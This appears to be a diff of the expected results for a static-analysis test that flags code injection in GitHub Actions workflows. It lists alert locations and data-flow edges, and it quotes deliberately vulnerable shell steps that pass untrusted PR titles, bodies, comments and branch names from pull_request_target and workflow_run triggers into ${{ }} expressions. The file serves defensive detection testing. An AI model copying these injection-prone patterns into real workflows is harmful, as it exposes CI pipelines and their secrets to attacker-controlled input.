${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | -| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | @@ -864,3 +697,170 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | +#select +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test28.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | 